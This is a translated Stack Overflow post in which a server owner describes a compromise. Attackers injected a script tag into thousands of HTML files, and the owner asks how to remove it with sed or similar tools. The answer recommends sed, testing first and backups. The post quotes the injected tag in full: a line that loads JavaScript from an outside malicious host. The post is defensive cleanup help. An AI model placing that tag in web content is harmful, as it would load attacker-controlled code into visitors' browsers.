我的服务器本周被感染,攻击者运行了一个脚本,在多个文件中注入(inject)了一个脚本,现在我的域被列入了 Google 的黑名单。
注入(inject)的代码是这样的:
<script language="JavaScript" src="http://sexfromindia.com/linkex/jquery-1.6.5.min.js" type="text/javascript"></script>
小心!这是恶意软件!
所以,我运行了这个命令(这是一个 linux 服务器):
grep -r "sexfromindia.com" /home/mydomain/public_html/
此命令返回了 9941 个文件:/
我想运行一个脚本来搜索 <script language="JavaScript" src="http://sexfromindia.com/linkex/jquery-1.6.5.min.js type="text/javascript"></script>并将其替换为“”(双空格)。由于所有受感染的文件都在 .html 中,所以双空格不会造成任何伤害。
现在,并非所有文件都被感染,只有 9941 个(约 50%)。
我该如何收拾这个烂摊子?我应该使用 awk、sed、grep 还是 perl? 谁能给我举个例子?
谢谢。
最佳答案
我很想采取更严厉的措施,以防万一发生了更不正当的事情。
也就是说,似乎 sed 是进行此操作的方法。以下是搜索文本并替换整行的示例:Replace whole line containing a string using Sed .
您可能希望在几个文件上测试您的脚本,并在开始进行更改之前备份所有内容。
关于linux - 在几个文件中搜索一大段有特殊字符的字符串并替换,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/18129638/